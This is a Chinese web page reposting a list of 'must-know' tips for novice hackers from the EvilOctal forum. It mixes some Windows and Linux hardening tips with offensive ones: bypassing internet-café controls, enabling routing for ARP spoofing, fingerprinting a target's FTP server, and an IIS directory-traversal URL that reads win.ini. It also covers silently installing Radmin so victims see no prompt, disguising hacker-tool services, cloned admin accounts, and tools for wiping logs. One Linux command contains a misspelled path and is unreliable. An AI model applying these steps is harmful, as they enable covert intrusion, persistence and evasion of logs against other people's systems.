电脑资料
当前位置:资料库>电脑资料>
我要投稿 投诉建议

Hack新手一定要知道的问题 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【meiwen.anslib.com - 电脑资料】

    整理:冰血封情  来自:http://eviloctal.hackway.net

    NO.1修改Terminal Server的端口

    服务端

    进入注册表编辑器,依次展开如下键名:

    HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp

    在右窗口中修改PortNumber的数值为任意端口号,推荐1025<端口号<65535

    客户端

    启动Terminal Server Client的客户端管理器,到出连接文件为*.cns,用记事本打开修改Server Port与服务器一致就OK了.

    最后将修改过的*.cns重新导入Terminal Server Client的客户端管理器,

Hack新手一定要知道的问题

    NO.2禁止远程访问注册表

    In order to keep your data away from the black hats, you should do more about your system, just like pay more attention to the remote registry service!!!

    方法一、

    右键单击‘我的电脑',选‘管理',‘服务和应用程序',‘服务'!

    停止并且禁用Remote Registry Service服务!

    方法二、

    打开注册表编辑器的如下键:

    HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurePipeServers

    把其下的WinReg的键职改成1就可以了。

    NO.3禁止非管理员用户使用AT命令

    这个小技巧的好处应该不言而喻:)

    启动注册表编辑器,展开如下键:

    HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa

    在右边新建立一个SubmitControl键名,DWORD值为1。

    NO.4使LINUX对PING不响应

    LINUX应该逐渐成为各位大峡小鸟手中之宝了吧?怎么才能让它不响应ICMP来保护自己呢?

    可以用:

    echo 1 > /proc/sys/net/ipv4/icmp_echo_igore_all

    想恢复的时候用:

    echo 0 > /proc/sys/net/ipv4/icmp_echo_igore_all

    NO.5让WIN98安全模式支持网络

    大家都知道WIN98安全模式要是可以进去,是可以不受网吧安全管理软件的约束的!BUT安全模式不加载网络驱动,下面冰血告诉你一种让WIN98的安全模式提供网络支持的方法。

    1、F8进入安全模式。

    2、选择Command Prompt Only。

    3、进入命令行状态时,输入Win /d:n即可以进入代命令行的安全模式。

    NO.6启动IP路由功能

    一般我们在WINDOWSNT/2K/XP使用ARP欺骗攻击的时候都需要先打开IP路由功能。

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

    IPEnableRouter=0x1

    NO.7强大的FC对比命令

    我们在使用系统和进行各种任务的时候经常需要用到文件的对比,那么我们是自己一点点的对比么?当然不是我们用强大的FC对比命令。

    具体参数请用FC /?进行查看

    NO.8通过验证Banner手工鉴别FTP

    cmd下输入

    ftp TargetIP

    User (TargetIP:(none)):ftp

    331 User name okey, please send complete E-mail address as password.

    Password:

    如果成功

    230 User logged in, proceed.

    如果失败

    530 Sorry, no ANONYMOUS access allowed.

    特别是这一行字是Serv-U的特有标志

    331 User name okey, please send complete E-mail address as password.

    假如是MS FTP呢

    cmd下输入

    ftp TargetIP

    220 antivirus Microsoft FTP Serveice(Version 5.0).

    User (TargetIP:(none)): ftp

    331 Password required for ftp.

    Password:

    530 User ftp cannot log in.

    特别是这一行字是MS FTP的特有标志

    331 Password required for ftp.

    NO.9漏洞qsumrhit.htw和iirturnh.htw的使用方法

    这个比较希奇,还是说说:

    提交例如如下的连接就可以了......

    连接iissamples/issamples/oop/qsumrhit.htw?ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full">http://www.xxxx.com/iissamples/issamples/oop/qsumrhit.htw?ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

    NO.10远程控制软件Radmin安装注意事项

    网络渗透中,

电脑资料

Hack新手一定要知道的问题》(http://meiwen.anslib.com)。使用远程安装Radmin的进行控制时候,必须使用如下命令:

    Radmin /install /silence

    否则对方的计算机窗口会弹出一个提示框说"远程管理服务已经安装"。

    NO.12终端服务客户端的操作问题

    注意,通过克隆而获得管理员权限的用户是和管理员共用一个桌面的。如果你在桌面建立东西,管理员那边是同样可以看见的。

    NO.13注册成服务的 软件的各项指标修改方法

    假如你已经吧一个叫hackertools的工具注册成了系统的服务,在服务列表中存在。那么你要怎么修改他的名字呢?

    这里进入注册表

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

    找到它的服务名,假设是hcktol,现在展开他的下面间。

    displayname就是服务显示名

    description就是服务描述

    另外可以通过用16进制编辑器修改服务进程名。

    用辅助工具instsrv.vbs把程序安装成自己的指定服务名和服务相识名服务。具体请看帮助,到处有下。

    NO.14有关清除日志的话题

    http://www.EvilOctal.com/forum/read.php?tid=1881

    http://www.EvilOctal.com/forum/read.php?tid=1821

    http://www.EvilOctal.com/forum/read.php?tid=1781

    http://www.EvilOctal.com/forum/read.php?tid=1610

    http://www.EvilOctal.com/forum/read.php?tid=1581

    http://www.EvilOctal.com/forum/read.php?tid=1490

    http://www.EvilOctal.com/forum/read.php?tid=1429

    http://www.EvilOctal.com/forum/read.php?tid=1337

    http://www.EvilOctal.com/forum/read.php?tid=1236

    http://www.EvilOctal.com/forum/read.php?tid=992

    http://www.EvilOctal.com/forum/read.php?tid=942

    http://www.EvilOctal.com/forum/read.php?tid=594

    http://www.EvilOctal.com/forum/read.php?tid=196

    http://www.eviloctal.com/forum/read.php?tid=2016

    以上是在 邪恶八进制(EvilOctal)暨安全高峰(SecurityPeak)论坛上 以关键字为"日志"的资料索引 分别对应如下主题:

    [转帖]3389如何擦除日志

    [转载]关于入侵检测系统之日志检测详解

    [转载]入侵检测之日志检测

    [转载]国外的培训课程 安全日志的秘密

    [转载]Windows日志的保护与伪造

    [转载]用perl写了个把IIS日志导入到mysql的程序

    [转载]终端服务的日志监控

    [转载]删除sql server日志

    [转载]WINDOWS安全事件日志中的事件编号与描述

    [转载]如何用elsave清除日志

    [转载]FreeBSD的系统log日志

    [转载]UNIX系统后门的安放和日志的擦除

    [转载]安全事件日志事件编号与描述

    [转载]详述Windows 2000的日志及其删除方法

    共13条信息

    非常感谢你支持偶们!

    关于...自动清除日志软件类很多

    如:

    小榕的elsave清除日志工具

    小榕的CleanIISLog来自动清除日志

    还有CSDN公布的ClearLogs工具

    以及擦PP工具0x333shadow

    专业清除日志iisantidote-v2工具也可以

    NO.15无法删除文件的问题

    有时候我们要删除一些文件 经常提示无法删除 EvilOctal总结了一下 主要有以下几种可能

    第一 文件名中可能有特殊符号

    那么无论你是在操作系统中 还是使用命令行下的del命令都是无法删除的 这时解决方法是使用命令rd "\\?\文件路径\文件名" 就可以删除了

    第二 有可能是文件正在使用中

    那么只要找到正在使用该软件的进程 终止后删除 当然一般情况下也可以到安全模式或者命令行下删除的

    第三 可能是文件的优先级不够高

    在任务管理器里 把相关进程的优先级降低 然后再一顿狂杀乱砍

    第四 也许是磁盘有逻辑错误

    使用chkdsk检查一下再行删除看看

    NO.16有关mid音乐格式的音轨调查

    今天朋友FlyingBird传输了一个音乐给我 mid格式的 但是实在是播放不了

    原来 mid音频走的是 音乐控制面版中的 软件合成器 的音轨

    不想 我把他静音了 所以什么也听不见

    在 主音量 控制面版里将 软件合成器 钩取消后就可以下的 静音 取消就可以放了...

    NO.17在139入侵过程中遇见host not found?

    在正常情况下应该是这样的:

    引用内容

相关文章
最新文章
推荐文章

Copyright©2006-2024 优文网 meiwen.anslib.com 版权所有 手机版